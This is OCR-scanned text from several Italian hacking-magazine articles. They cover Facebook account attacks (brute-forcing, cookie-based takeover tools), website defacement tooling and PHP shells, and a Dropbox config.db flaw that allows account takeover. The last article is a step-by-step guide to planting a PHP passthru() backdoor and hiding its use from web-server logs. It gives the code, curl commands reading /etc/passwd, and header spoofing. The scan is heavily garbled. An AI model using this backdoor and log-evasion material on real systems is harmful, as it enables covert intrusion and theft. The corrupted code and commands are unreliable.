dei documenti. Il sito è ripreso da 
migliaia i altri Siti, i torrent viaggiano 
e si diffondono in rete come 
un'epidemia che difficilmente potrà 
essere arrestata. 
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Ti fidi di facebddk? 

lV/ ECCO COME BUCARE IL 
J!L SOCIAL NETWORK 

l 



Diciamocelo: nolenti 
o volerti i social 
network sono un 
successo planetario 
che prescinde dalla 
qualità e quantità dì cose scritte 
fuori e dentro. Facebook (FB) è 
forse ii fenomeno più clamoroso, 
per la crescita continua di persone 
connesse da tutto ii mondo e i 
fenomeni di aggregazione che 
raccolgono individui fisicamente e 
culturalmente distanti, 
Ma FB è pur sempre 
un'applicazione software e come 
tale soggetta a bug, falle di 
sicurezza e anomalie. Vediamo cosa 
si rischia quindi a utilizzarlo e a 
comunicare al social network foto e 
informazioni personali. 



HACK DI UN INVITO 



Può capitare che se usiamo da 
tempo internet abbiamo diversi 
indirizzi e-mail che nel tempo 



riti .- abbiamo dato ad amici, colleghi. 

parenti e cosi via e che quindi 
i non tutti si siano sincronizzati con 

arie l'ultimo account che stiamo usando 
alla come ufficiale, ad esempio su 
ritte G mail. Disgrazia vuole che qualcuno 
ì) è con cui desideriamo assolutamente 

roso, diventare amici su FB ci ìnvii 
ersone l'invito proprio su un account 
ei che vorremmo chiudere, ma non 

ne possiamo. Potremmo provare 

ente e ad aggiungere if nostro amico al 

nostro profilo FB cercandone nome, 
cognome e-mail. Ma potremmo 
:ome anche ottenere centinaia dì risultati, 
o nessuno perché magari ha scelto 
no cosa uno pseudonimo e non ì dati reali, 
e a Perdiamo quindi la possibilità di 
k foto e agganciarlo al nostro network dove 
siamo registrati con un indirizzo 
diverso? Per nulla, basta un minimo 
di hacking. 
V I T □ L'U RL che ci ha i nviato FB vìa 
^^^h e-mail ha un formato simile a 
questo: 

da http:/Avww.facebookxom/p.php?i 
«-si =XXXXXXXXX&k=YYYYYYYYYY&r 
3 &v=2 



Dove XXXXXXXXX rappresenta 
l'iD su FB dell'utente che ci 
ha contattato. Con questa 
informazione possiamo raggiungere 
direttamente il suo profilo su Fa 
sostituendolo all'indirizzo sotto 
http://www.facebook.com/profile. 
php?id=XXXXXXXXX 
Una volta aperto, clicchiamo su 
"Add as Friend" e dopo essere stati 
accettati dal nostro amico possiamo 
cestinare il vecchio invito, La 
protezione è effettivamente debole, 
trasmettendo all'esterno del social 
network un identificativo privato. 
Restane tuttavia le difese interne 
basate sull'autenticazione dei due 
utenti coinvolti. 



CRACK DELLA 
PASSWORD 



Qualcuno si aspetterà di venire 
a sapere prima o poi che ci Sia 
una grave falla di sicurezza o 
magari grazie a una mano data 
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da Microsoft, siano state lasciate 
delle vulnerabilità intrìnseche 
che permettono di accedere 
liberamente agli account di FB, 
Invece senza troppe speculazioni, 
e stato realizzato un piccolo tool 
scrìtto in Java che fa il suo dovere 
alla vecchia maniera, con un brute- 
force. 

Può utilizzare vocabolari di parole 
già pronte ed è gratuito. Si Chiama 
Facebooz (http:fffacebooz.goldeye. 
info) e gli occorre solamente un 
Java Runtime-Environment per 
funzionare locafmente. Si inserisce 
l'e-mail della vittima, si carica il 
dizionario che si vuole utilizzare 
e lui parte, incurante delle pause 
generate dalla controffensiva di FB 
che allungheranno i tempi, ma si sa 

.che la pazienza è la virtù dei forti! 
Questo per ricordare che una 
password non è mai troppo 

I complicata! Ed è bene usare anche 
caratteri più strani creando parole 
o frasi senza senso. 



CONTROLLO 
DI UN ACCOUNT 



Esistono poi metodi più raffinati 
per sconvolgere la tranquillità di 
un utente FB, che basano l'attacco 
sui cookie che sono generati man 
mano che utilizziamo il social 
network per prendere contatto 
con gli altri utenti. In pratica può 
essere realizzato un vero sniffing 
di credenziali d'accesso da remoto 
basandoci sulle informazioni 
che FB ci permette di ottenere 
sulla vittima. Il risultato finale 
può essere quello di prendere 
il controllo di un account su FB 



senza conoscere la password di 
accesso e senza che la vittima se 
ne accorga. 

Per avere i cookie ogni metodo 
può andare bene: sniffando il 
traffico, XSS, social engineering, 
ARP Poison-Sniffing. Basta 
loggarsi in FB con il proprio 
account e sniffare i propri cookie 
o raccoglierne di nuovi man maro 
che entriamo in contatto con 
l'obiettivo. 

Alla fine avremo raccolto i dati 
necessari da dare in pasto a 
un tool abbastanza potente 
chiamato FBControllerfhttp:// 
my.opsra.comj'q uakerd oom er/ 
bl 09/f bcontro! ier-v 3-fMacebook- 



FBController n 
somiglia 
molto ai I 
tool dei ' 
lack-hat, 
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• ^ raggiungere. Per ogni nuovo ID 
raggiunto vengono ©stratte le 
C^a i liste di amici e possono partire 
nuove ricerche in modo ricorsivo, 
Questo quindi negando di 
fatto il controllo di FB sulle 
relazioni, la chiave centrale 
del funzionamento dei social 



I Nexus è un plugin motto efficiente che riesce b 
ricostruire la rete di connessioni che potrebbero 
fegarcf a un utertie veramente distante da noi. 



control-utility-version-3-0). 
Tramito questo strumento è 
passibile prendere il controllo di 
qualunque account ad esempio 
per controllarne la lista degli 
amici online o avviare una 
conversazione come fossimo 
quell'utente e soprattutto inviare 
e ricevere messaggi al suo posto. 

E' possibile vedere la cronologia^ 
delle conversazioni passate É 
dell'utente vittima con I suoi m 
amici a prescìndere che m 
essi siano online o offline, M 
effettuare "Poke" ai suoi amici 
e modificare S parametri relativi 
alla Privacy. 

Nella versione 3,0 di FBGontroiler 
viene poi inserito il Faceijook 



Nexus Explorer (attualmente in 
beta), che funzionando come un 
motore di ricergjlfpermette di 
individuare yj^riti di FB a partire 
dalle listelli amici, restituendo 
il numero' di salti necessari a à 
ragarfgere gli u|*t>ti trovati. Ini 
FB esiste una funzionalità simile 
chiamata -Mutual friend" che 



■iene però lii 
"salto, mentri 
sono limiti (r 
limito è terni 
comunque).! 



itala a un solo 
Con Nexus non ci 
ita beta attuale il 
igneamente a uno 



Il funzionamento è molto 
semplice: basta definire l'ID 
di partenza e un ID obiettivo, 
oltre a indicare la profondità 
della ricerca che si intende 



CONCLUSIONI 



Questa piccola panoramica 
voleva soltanto mostrare alcune 
delle debolezze inevitabili di un 
social network come FB. 

E ricordando che nel campo degli 
Ojffil progressivo affermarsi di 

JfvindowS come sistema desktop 

fè coinciso con l'aumento 
esponenziale di virus e attacchi 
diretti verso questa piattaforma, 
assisteremo molto presto al 
propagarsi di minacce serie 
che funzionano grazie alle API 
dei social network e riescono 
a infettare molte più vittime, 
spesso poco esperte a quindi più 
vulnerabili, in brevissimo tempo. 

Agii amministratori di rete 
l'arduo compito di far conciliare 
informazione e prevenzione degli 
utenti per i quali si è responsabili. 
Alle riviste come la nostra quella 
di suonare campanelli di allarme. 
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IL DEFACCt AMENTO DI UN 



SITO 



BPESSD SDLD UN 



ATTD DIMOSTRATI VP. ALTRE 
VDLTE NASCONDE REALTA P 
COMPLESSE. 



D «tacciare è una parola 
che ha cominciato ad 
assumere una certa 
popolarità intorno alla fine 
degli anni '90, quando il fenomeno 
internet ha cominciato a crescere 
e, sebbene sia una terminologia 
di strettissima attualità, fatica 
ancora a trovare uno spazio nei 
dizionari come neologismo. Con 
Defacciamento si intende, in 
termini davvero generali, spesso 
la semplice e sola sostituzione 
della pagina di index di un sito 
con un'altra di contenuti diversi 
caricata proprio dal "defaccìatore". 
I contenuti della nuora pagina di 
indice caricata possono essere 
davvero molteplici, dipende 
tutto sommato da quali sono le 
intenzioni di chi porta questo 
genere dì attacchi, si va dalla 
schermata burlesca fine a se 
stessa a veri e propri proclami e 
atli di denuncia. 

Ma questa e evidentemente solo 
la punta dell'iceberg. Il fenomeno 
del Defacement ha implicazioni 
Spesso più profonde. 1 siti web 
che subiscono pesanti attacchi 
di defacement sono altre volte 
trasformati in veri e propri nodi 
di botnet, backdoor e account 
di shell venduti al mercato nero: 
questo è ciò che quotidianamente 
avviene su Internet. Il presente 



articolo analizza le modalità e gli 
strumenti utilizzati dai "defacer" 
per condurre i loro attacchi nei 
confronti dei siti web, fornendo 
al contempo preziosi consigli per 
evitare di divenire noi stessi facile 
bersaglio di tali malintenzionati. 



IL "DEFACCÌATORE' 



Il defacer, in genere, non presta 
mai particolare attenzione al 
tipo di sito web da sottoporre ad 
attacco; il suo scopo principale 
rimane quello di individuare e 
sfruttare al meglio le vulnerabilità 
presenti in certi server, per 
poi modificare il contenuto o 
l'aspetto visivo dei siti web violati, 
oppure lasciare tracce tangibili 
della "cortese" visita effettuata, 
caricando magari nel server 
compromesso un file che evidenzi 
l'azione di defacing appena 
compiuta. In realtà nessuno sa 
spiegare concretamente perché 
i defacer agiscano in tal modo, 
visto Che la loro losca attività non 
sembra produrre alcun evidente 
profitto in termini pecuniari. 
Esplorando tuttavia gli appositi 
archivi online che raccolgono 
e catalogano gli innumerevoli 



"exploit" realizzati dai defacer, ci 
rendiamo subito conto che è in 
atto ormai da tempo una strenua 
competizione tra i vari gruppi di 
defacer operanti in Rete, al fine di 
realizzare le migliori performance 
in termini di danneggiamento dei 
maggior numero possibile di siti 
web. Sebbene i media continuino 
a definire semplicemente come 
"hacker" le persone che compiono 
tali atti, vorrei in ogni Caso 
precisare che i "veri" hacker non 
conducono mai attacchi casuali 
nei confronti dei siti Internet, ma 
sfruttano al meglio le conoscenze 
tecniche acquisite per realizzare 
azioni di hacking ben mirate. Gli 
hacker cercano inoltre di proposito 
di evitare che i proprietari dei siti 
compromessi possano rendersi in 
qualche modo conto dell'attacco 
subito; al contrario, essi fanno 
sempre tutto il possibile por 
nascondere o cancellare ogni 
traccia o evidenza dell'attacco 
portato. 



DEFACEMENT 



Gli attacchi eseguiti dai defacer 
sono comunemente definiti con 

il termine di "dcfaccmcnt"; in 
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Internet esiste tutta una serie di siti 
web che fungono da veri e propri 
archivi (peraltro molto estesi) delle 
azioni di defacement compiute: 
come riferito sopra, esiste altresì 
un'ampia comunità di defacer, i cui 
gruppi e membri sono in perenne 
concorrenza tra loro per stabilire 
chi sia in grado di oraccare e 
danneggiare il maggior numero 
possibile di siti web. Tali archivi 
sono pubblicamente accessibili, 
il che significa che ogni gruppo 
di defacer può ad ogni momento 
verificare quanti "punti" esso sia 
riuscito a collezionare in classìfica, 
tenendo al contempo sott' occhio 
t "successi" ottenuti dai gruppi 
rivali-1 defacer non applicano 
alcun criterio di selettività nei 
confronti dei loro obiettivi; nella 
maggior parte dei casi essi si 
avvalgono semplicemente di 
tool automatizzati preposti ad 
individuare i server vulnerabili, 
per poi sfruttare questi ultimi in 
maniera ngualmente del tutto 
"automatica". L'exploit carica 
automaticamente sul server 
compromesso una backdoor la 
cui funzione è, ad esempio, quella 
di tornire l'accesso sheìl a tale 
server. Il defacer pud ovviamente 
lanciare ulteriori attacchi tramite 
la suddetta backdoor, per cercare 
di aumentare i privilegi grazie 
agli exploit del kernel locale, 
o magari segnalare il server 
compromesso ad un apposito 
archivio di defacement. Simili 
backdoor vengono vendute 
anche sul mercato nero della 
cybercriminalità, consentendo 
in tal modo ai toro acquirenti di 



Spesso l'attività 
di tiefacciamento 
ha scopi 
puramente 
divulgativi 
ideologici: serve 
in sostanza per 
comunicare un 
messaggio, aneliti 
estremo. 



poter ad esempio trasformare un 
server violato in un vero e proprio 
nodo di una rete DdoS, o magari 
di utilizzarlo in qualità dì host per 
inoltrare e-mail di spam. 
Una volta che l'attacco è andato 
in porto, l'azione di defacement 
compiuta viene automaticamente 
segnalata ad un archivio online. 



ELI STRUMENTI 



I defacer si avvalgono innanzitutto 
di appositi scanner per individuare 
i server vulnerabili da sfruttare; 
una volta completato il processo 
di scansione ed identificati i 
server-vittima, i malintenzionati 
provvedono a caricare all'interno 
di questi ultimi speciali backdoor 
in grado di fornire loro prosteso 
informazioni riguardo alle macchine 
infettate e di svolgere, al tempo 
stesso, la funzione di scanner 
aggiuntivi. Nella maggior parte dei 
casi, gli exploit utilizzati dai defacer 
sono pubblicamente disponibili, 
anziché essere del tipo "zero-day". 
Per identificare i server vulnerabili i 
defacer ricorrono spesso all'utilizzo 
delle "Google Dorks": si tratta 
di particolari query di ricerca, le 
quali possono essere ad esempio 
eseguite per ottenere determinati 
risultati riguardanti tutti i siti web 
in cui risulta attiva una Specifica 
versione di una certa applicazione. 
In alcuni casi, è la backdoor stessa 
utilizzata dai defacer a generare 
il download di speciali database 
contenenti particolari Google 




Dorks, divenendo in tal modo 
una sorta di nodo di scansione 
dedicato alta ricerca di nuovi server 
vulnerabili. 

Gli strumenti utilizzati dai defacer 
per individuare nuovi server j j 
vulnerabili verificano in primo 
luogo la presenza di due tipi di 
vulnerabilità: le vulnerabilità per file 
remoti e quelle dì tipo Locai File 
Include. Riportiamo qui di seguito 
un elenco parziale di tali strumenti, 
che risultano peraltro essere del 
tutto gratuiti e pubblicamente 
disponibili: 

LFI intruder 

VopCrew IJO Scanner vi ,2 
Single LFI vulnerable scanner 
SCT SQL SCANNER 
PrìvB RFI SCANNER v3.0 
PITBULL RFI -LFI SCANNER 
Osirys SQL RFI LFI SCANNER 
FecLCoMz RFI Scanner Hot v5.6 
By FgTaLisTiCz Fx 



Come accennato in precedenza, 
una volta individuato il server 
vulnerabile, i defacer provvedono a 
generare il download di un'apposita 
backdoor all'interno di tale server. 
Le backdoor presentano una 
vasta gamma di funzionalità, ma la 
maggior parte di esse possiede dei 
metodi specifici per bypassare le 
funzioni di sicurezza PHP, rubare 
informazioni, leggere e modificare 
i file, accedere a database SOL, 
c rateare password, eseguire 
comandi arbitrari e modificare i 
privilegi. Nel corso della mia ricerca 
ho rilevato oltre un centinaio di 
differenti backdoor e shell PHP; 
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pare, tuttavia, che la maggior 
parte delle backdoor individuate 
irt sostanza utilizzi gli stessi tipi di 
base, ovverosia: 

rS7 
c99 

pScus7Shell 

Le modalità di cui si avvalgono le 
backdoor per cercare di modificare 
i privilegi consistono principalmente 
nell'utilizzo di "auto-rooters" o nel 
tentativo di estrarre le password 
da« file di configurwronc custoditi 
all'interno del server compromesso. 
1 cosiddetti "auto-rooters" altro 
non sono che script di sliell che 
provvedono a generare nel server 
il download di uno specifico 
kit di exploit, composto da 
exploit pregompilats già pronti 
per essere eseguiti. Lo script 
di shell analizzerà in seguito la 
macchina compromessa, al fine di 
determinare quali sono gli exploit 
da eseguire; verrà infine lanciata 
l'esecuzione di questi ultimi. 
Se i'expSbif riesco nell'opera di 
modificare con successo i privilegi, 
avrà poi luogo l'instali azione di 
un'altra backdooro di un rootkit. 
Gli "auto-rooters" vengono offerti in 
Relè da numerosi siti. 



SPLUZI □ N I 



no dei problemi più grandi 
nel combattere gli attacchi di 
defacement è che i defacer non 
sfruttano solamente vulnerabilità 
tecniche ma anche l'ignoranza di 
numerosi operatori. In effetti, la 
maggior parìe delle persone che 
lavorano con i Server web non 
comprende ancora pienamente 
l'importanza di avere un sistema 
costantemente aggiornato e dotato 
di tutte le ultime patch disponibili. 
L'installazione delle patch via 
via rilasciate dai produttori di 
software, indipendentemente 
dalla fondamentale importanza 
che essa riveste, risulta oltretutto 



un'operazione piuttosto semplice 
da eseguire; nonostante ciò, 
una delle questioni più comuni 
tutt'oggi legate alla sicurezza 
online è ancora rappresentata dal 
non mantenimento di adeguati 
standard di aggiornamento per il 
sistema informatico utiliziate. Le 
società e le organizzazioni spesso 
spendono molto tempo ed energie 
per spiegare al proprio personale 
IT come funzionano le iniezioni 
SQL ed i buffer overflow, e come 
possono essere sfruttate per un 
attacco, quando sarebbe invece 
molto più utile ed opportuno 
concentrarsi nel garantire che 
i sistemi siano completamente 
aggiornati e configurati in maniera 
appropriata. 



L'DB 




Un'altra questione di fondamentale 
importanza è rappresentata dal 
fatto che gli amministratori danno 
spesso por scc iiato che il sistema 
operativo Linux/Unix sia più 
sicuro di Windows; in tal modo, 
essi non provvedono a rafforzare 
adeguatamente le misure di 
Sicure22a adottate e ad aggiornare 
le configurazioni utilizzate. 
Una corretta configurazione del 
sistema può in effetti risultare 
determinante per eliminare certi tipi 
di exploit. Ad esempio, molti degli 
exploit menzionati nel presente 
articolo sfruttano, in sostanza, 
vulnerabilità del tipo "File Include", 
le quali consentono al defacer di 
introdurre all'interno del server 
compromesso qualsiasi tipo di 
file arbitrano; in alcuni casi tali 
file possono provenire anche da 
siti web esterni. Per proteggersi 
efficacemente nei confronti di 
simili attacchi sarebbe pertanto 
sufficiente specificare la directory 
dalla quale una determinata 
applicazione web od un sito web 
risultano autorizzati ad effettuare 
l'inclusione di file all'interno del 
server, 




Recentemente l'organizzazione 
Iranian Cyber Army ha 
"defacciato" l'home page del 
più importante motore di ricerca 
cinese, ovvero Baidu.com, che 
per inciso, supera come utenti 
dì gran lunga Google. 




Il defaccia mento, a scopo 
puramente dimostrativo, del sito 
delle Poste Italiane. Per fortuna 
l'intento era quello di stupire 
più che di colpire: buon per gli 
amministratori di sistema che 
hanno potuto porvi rimedio. 




Sempre l'Iranian Cyber Army 
si era preoccupato di portare, 
qualche tempo fa, un attacco a 
Twitter. 
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Come compromettere un account drdpbdx. 



Negli ultimi tempi si 
parla sempre più 
spesso di analisi 
forense, una disciplina 
che ha acquisito 
un ruolo centrale 
nelle indagini che coinvolgono 
apparati informatici. E proprio da 
queste settore provengono continui 
stimoli legati alla sicurezza dei dati 
personali, come il contributo di 
Derek Newton (derecknewton.com) 
su Droptw. Dropbox è in questo 
momento il più popolare programma 
di sincronizzazione remota di cui 
abbiamo già parlato in passato (vedi 
HJ 192), tale da rendere necessario 
conoscere i suoi meccanismi ai fini 
di eventuali indagini; per questo 
motivo Perek ha applicato i criteri 
di analisi forense su questo tool per 
approfondirne il funzionamento. Nella 
sua analisi sono emersi degli aspetti 
interessanti legati alla possibilità 
di compromettere la sicurezza di 
un account Dropbox, che in ultima 
istanza è strettamente connessa alla 
modalità di autenticazione adottata 
"by design" (c'è poco da (are). 



IL PUNTO DEBOLE 



il compito principale di Droptjox è 
quello dì tenere sincronizzati ì file 
attraverso diversi sistemi e su diversi 
dispositivi di propria proprietà in 
modo automatico. Perché ciò sia 
possibile, è necessario: 
» Installare un client Dropbox; 
» Al termine di questa installazione 
inserire le credenziali per accedere al 
servizio (o sarà richiesto di crearne di 
nuove nel caso non siano presentii; 
* Indicare quale tra le cartelle del 
proprio hard-disk si vuole dedicare 
all'attività di sincronizzazione. 

Successivamente il Client funziona 
in modalità residente controllando 
continuamente la cartella dedicata 
(e le sue sottocartelle) per eventuali 
variazioni o aggiunte nei file presenti. 
A prescindere dal sistema 
operativo nel quale è installato 
il client, DropboK durante il suo 
monitoraggio immagazzina dati di 
configurazione, l'elenco dei file e 



delle cartelle, codici di verifica (hash) 
e i dati temporanei in un insieme di 
piccoli database SQL situati nella 
cartella %APPDATA%\Dropbox. 
In particolare uno di questratiira la 
nostra attenzione perché afferisce 
alla configurazione del client (config, 
db). Proviamo ad aprire questo file 
con il nostro programma preferito 
per SQL (ad esempio SQLIiteman 
sotto Linux). Troveremo una tabella 
chiamata config contenente diverse 
righe di contigurazione. 

In particolare la nostra attenzione è 
attratta da alcune righe: 

* Email: questo è l'indirizzo e-mail 
del proprietario dell'account che 
incredibilmente non viene utilizzato 
nel processo di autenticazione e 
può essere variato a piacimento 
(rispettando la formattazione di 

un indirizzo e-mail) senza causare 
malfunzionamenti. 

• Dropbox_patti: definisce il 
percorso radice della cartella che 
sarà sincronizzata da Dropbox nel 



sistema dove è ir funzione. 

* Hostjd: è assegnato al sistema 
dopo che è Stata realizzata 
l'autenticazione iniziale al termine 
dell'installazione e che non sembra 
cambiare col tempo. 

Dopo alcune prove è emerso Che il 
Client Dropbox utilizza solamente 
hostjd per autenticarsi. E qui 
nasce il problema: il file config.db è 
completamente trasportabile e non e 
in alcun modo ancorato al sistema. 
Questo significa che se qualcuno 
guadagna l'accesso al cortfig, 
db di un utente (o anche soltanto 
del valore assegnato a hostjd), 
avrà la possibilità di autenticarsi e 
accedere liberamente al suo account 
fintanto che tafe utente non rimuova 
l'host nel quale è Stato generato 
Phostjd compromesso dall'elenco 
dei dispositivi agganciati tramite 
l'interfaccia web di Dropbox. 
Per verificare questa possibilità è 
sufficiente copiare il file config.db 
in un altro sistema, accertandosi 
che dropbox_path punti a un 
percorso valido e lanciare Dropbox: 
assisteremo all'immediata 
autenticazione senza alcuna 
richiesta di verifica delle credenziali 
per autorizzare l'utente e senza 
verificare che il dispositivo dal quale 
si sta accedendo sia effettivamente 
collegato e presente nella lista dei 
dispositivi collegati (anche nel caso 
in cui il sistema abbia un nome 
completamente diverso) e questo 
sembra essere il funzionamento 
previsto da progetto! Inoltre 
hostjd rimane valido anche dopo 
che l'utente cambia la password 
di accesso, quindi un'eventuale 
soluzione basata sul recupero delle 
credenziali non risolve il problema. 

Ovviamente, se un attaccante ha 
accesso a config.db (nell'ipotesi 
che non sia stato inviato dall'utente 
stesso, durante un attacco di 
social engineering), vuol dire che 
ha sicuramente accesso a tutti i 
file contenuti nell'account. Questo 
significa che potrebbe essere 
sviluppato uno specifico malware 
in grado di recuperare proprio il 
config.db, o anche solo la parte 
sensibile del piccolo db e nel caso 



in cui tale malware venga rilevato 
una procedura generica di cambio 
password non impedirà comunque 
all'attaccante di accedere comunque 
all'account della vittima. 
Per difendersi opportunamente 
l'utente dovrà infatti rimuovere 
via web il suo sistema da quelli 
autorizzati, Bisogna poi considerare 
che il dato di hostjd è composto 
da appena 16 byte, davvero 
pochi rispetto ai gigabyte di dati 
potenzialmente riservati che possono 
essere contenuti negli account. Il che 
rende il rischio davvero elevato. 



COME 
PROTEGGERSI 



La soluzione che sembra più 
adeguata è quella di proteggere i dati 
contenuti nell'account utilizzando 
una cifratura forte, ad esempio con 
password lunghe (le cosiddette pass- 
phrase}. Personalmente consiglio di 
utilizzare TrueCrypt per cifrare i dati 
di Dropbox o addirittura di realizzare 
un contenitore cifrato all'interno del 
quale installare Dropbox e la cartella 
da sincronizzare in modo da celare 
anche Dropbox dalle applicazioni 
installate. E' chiaro che questa 



soluzione non rende hostjd blindato, 
ma è sicuramente più difficile 
scoprirlo. 

Ovviamente Ci si deve sincerare 
di aver rimosso eventuali vecchi 
sistemi dalla lista dei dispositivi 
autorizzati, oltre che monitorare 
l'ora dell'ultima attività che compare 
nella lista Aecouni->My Computerà 
nell'interfaccia online di Dropbox. 
Se si rileva un sistema che non 
dovrebbe esserci, sarà opportuno 
scollegarlo immediatamente (unlinkj. 

Non nascondo Che io stesso utilizzo 
Dropbox da anni e verificando ho 
trovato diversi (miei) sistemi che 
erano ancora autorizzati. 
E auspicabile che Dropbox riconosca 
presto il bisogno di aggiungere 
meccanismi per aumentare le 
sicurezze e impedire che possano 
realizzarsi accessi non autorizzati 
a lungo termine negli account degli 
utenti. Molti utenti si sono lamentati, 
ma ufficialmente l'azienda risponde 
assicurando che i collegamenti SSL 
e la cifratura AES 256 nei loro server 
sono più che adeguati. Fino ad allora 
speriamo Che questo articolo abbia 
allertato qualcuno e che chi utilizza 
abitualmente Dropbox si preoccupi 
di proteggere (realmente) i suoi dati. 







lanciamo SQILiteman e apriamo contig.éb: eoa semplicità vedremo comparire 
la tabelle config e potremo veliere I dati (in chiaro) della configurazione di 
Dropbox. Un metodo di reglsirazione acoennt tutt'altro che sicuro.' 
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Impariamo come rendere più difficile la vita a chi 
tenta di individuarci attraverso l'analisi dei log 



Per testare gli esempi qui proposti è sufficiente disporre 
di una distribuzione Linux qualsiasi, aver installato curi, 
aver avviato un web server con supporto PHP (nel taso di 
Apache lanciate ,'etc/ init . d/httpd atart da linea di 
comando) e posizionato tutti gli script dentro la Documen- 
IRoot (solitamente /var/www/html), 



Tipicamente un attacco informatico si compone di tre fasi. 
Nella prima, detta di Information Gathering. si parte 
con ridentificazione del target. Nella seconda, l'attacco 
vero e proprio (Exploitation), si cerca di compromette- 
re l'obiettivo ottenendo ad esempio l'accesso ad una steli 
interattiva. La terza fase é il Post Exploitation avvera 
quando, una volta completata l'i ntru sione, si cerca di man- 
tenere ii controllo del target il più a lungo possibile, magari 
attraverso una backdoor. Tutte queste fasi producono un 
certo livello di evidenze o disturbo nei file di log del si- 
stema target. L'obiettivo di chi attacca è invece ovviamente 
quello di non essere scoperti. Poiché l'invisibilità completa 
in un sistema è una chimera (un raotkit per quanto com- 
plesso lascia sempre delle tracce da analizzare, mentre 
una backdoor collocata in un file binario verrà sicuramente 
spazzala via al successivo aggiornamento applicativo) un 
buon compromesso raggiungibile può essere semplice- 
mente acquisire la capacità di generare il minora rumore 
di fondo possibile. 

Supponiamo ad esempio di essere riusciti, sfruttando una 
vulnerabilità applicativa, ad accedere al sistema target e 
modificare uno script php esistente in modo da aggiungere 
une chiamata alla funzione pasmtìiru ( ) : 

fivename; testLphp 

echo "«piAPPLICAZIONE IYZ<p>"; 

@passthtrutS_GETl ' end '1); 

?> 

Prima della modifica, il normale funzionamento dello script 
era quello- di ritornare al browser il messaggio "APPLICA- 
ZIONE XYr (Figura 1). Tuttavia con il semplice inserimen- 
to della chiamata passthru ( ) , se il parametro cmd viene 
popolato con un comando di sistema, questo viene esegui- 



to e l'utente ottiene in ritorno anche II relativo output. Da 
notare l'importanza del simbolo '@' prima del nome del- 
la (unzione che sopprime la visualizzazione degli errori a 
video, Vediamo come è possìbile lanciare dei comandi a 
piacimento con eurt sfruttando questa semplice backdoor: 



$ curi http://ip_serviu:/tGstl,ptip?cmd=i<i 
<p>APPLI CA.Z I OHE SYK/p> 
uid-i8(apaehe) gid=48(apache) 
groups=48 tapache) 



5 curi kttp://lp_sarveir/tsstl . 
pbp?cmd=catì20/etc/passwd 
cps-APPLICAZIOHE XKZ</p> 
root:jt:Ùi 0:rt»t: /root: /bin/bash 
bin ; x : 1 i 1 sbin : /blu : /sbìn/nologin 
[-] 



Il risultato del comando viene riportato assieme all'output 
normalmente trasmesso dall'applicazione (il testo "APPLI- 
CAZIONE XYZ"), Osservando i log del web server (tail 
-i /vai71og/hrtpd/access_log) le precedenti ope- 
razioni hanno generato le seguenti evidenze: 



a.b.c.a - - [12/Jan/30ll:lli33!31 +01Q0J 
"(SET /testi. pliprcrad^id HTTP/1. 1" 200 104 

"curl/7.15,5 (3tS6_64-jredliat-liiiux-gnu) 
libeucl/7 .15.5 OpenSSX/0.9.Bb zlib/1.2,3- 
libidp/0.6.5" 




a.b.c.d - - [12/Jan/201l5 14: 11:31 +0100] 
"GEI /testi. php? cmd 'e at 1 2 0/etc / pas- 
swd HTTP/1.1" 200 19 18 "-" "curl/7 . 15 . 5 
(xS6_64-redhat-lin«x-gnu) libcurl/7 . 15 . 5 
OpcnssL/0 . 9 . Sb slib/1.2.3 libidn/O. 6 . 5" 

L'amministratore di sistema può in pratica facilmente indi- 
viduare fa presenza di un parametro sconosciuto e quale 
comando è staio eseguilo (es, cmd=id) riconducendolo 
immediatamente alla scoperta della backdoor. Dal punto di 
vista dell'attacker accorre chiaramente prendere dei prov- 
vedimenti per mascherare meglio l'utilizzo della backdoor. 
Un maggiore livello di occultamento lo si Potrebbe raggiun- 
gere utilizzando il metodo HTTP POST invece di GET: 

Menarne: te$tì.php 

<?php 

echo "<p>apl>LlCflZlONE XYZ</p>"; 

£passtbru($_PQSTf 'crad' ] ) ; 

?> 

Con questa modifica non è più possibile passare il coman- 
do da eseguire direttamente nella querystring. Il parametro 
cmd ed II relativo comando andranno invece fomiti utilizzan- 
do un'apposita struttura applrcatron'x-www-form-ur- 
lencodetì. Con curi il solo onere aggiuntivo rispetto all'e- 
sempio precedente consiste nel fare uso dell'opzione -d; 

$ curi http://lp_server /test2.php -d 

l-ì 

u±d=4S(apache) gìd=48(apaclie) 
groups>=48 ( apache ) 

Questa volta la traccia lasciata nei file di log è la seguente: 

«.b.c. a - - [lì/ Jan/2011: 15:34:37 +01001 
"POST /test2. php KHP/1..1' 200 105 "-" 
"Curi / ? . 13 . 5 < sB 6_64-r«?dhat - 1 inux - gnu ) 
libcurl/7 .15.5 OpenS£L/0.9.8b alib/1.2,3 
libidn/0. 6. 5" 

Il risultato ottenuto dall'attacker è che gii argomenti tra- 
smessi con POST non sono stati leggati, ovvero dai log 
del web server non è possibile individuare il comando tra- 
smesso. Tuttavia la presenza di un User Agent non stan- 
dard, cosi come l'assenza di un Referer, potrebbero anco- 
ra insospettire l'amministratore di sistema. Fortunatamente 
entrambe le informazioni sono facilmente falsificabili lato 
client. Volendo rimanere fedeli alla serie d : esempi fatti con 
curi, le opzioni da linea di comando da impiegare sono -A 
per impostare l'User Agente e -e per specificare il Referer; 

$ curi http: //ip server /tast2.pbp -d 
"cmd"ìd" -A "Mozilla/5.0 (Windows j 
U; Windows tre 6.1; it; ersi, 9, 2, 13) 
Gecko/20101203 Firefox/3 . 6. 13" -e "http:// 
ip^server/" 



Nei log è adesso apprezzabile la seguente evidenza: 

a.b.c.d - - [12/Jan/2011: 16:03:01 +0100] 
"POST /test 2. php HTTP/ 1.1" 200 105 
" http : // ip server/" "HoE.illa/5.0 <win- 
dp>i5 ; U; Windows MI 6.1; it: rv: 1 ■ 9 . 2.13-1 



Secko/20101203 gi.rofQa/3.6.13 " 

Supponiamo invece che la modalità comune utilizzata dai 
client legittimi per accedere all'applicazione {o comunque 
allo script php) in cui è stata inserita la backdoor sia tra- 
mite GET, Un numero elevato di POST verso questa pa- 
gina potrebbe chiaramente insospettire l'amministratore di 
sistema. La domanda da porsi a questo punto è: esiste un 
modo per continuare ad invocare una pagina utilizzando il 
metodo GET ma evitando che gli argomenti siano leggati? 
La risposta è affermativa. Immaginate Infatti una modifica 
di questo tipo: 

filertame: test3.pttp 
<?php 

acho "<p> APPLICAZIONE XIZ</p>"; 
epassthEU [ S_COOKIE [ ' end' ] ) ; 



Il comando da far eseguire al server in questo caso viene 
passato tramite cookie. Per quel che riguarda curi, solle- 
citare la backdoor comporta unicamente l'impiego del flag 
-b da linea di comando: 

5 cori http ; //ip_SQrvsr /testi. php -b 
"cadmiò" -A "itosi JI a/5.0 (ìfiaàems; 
V; Windows ST 6.1; it; rv:l,$.2,13) 
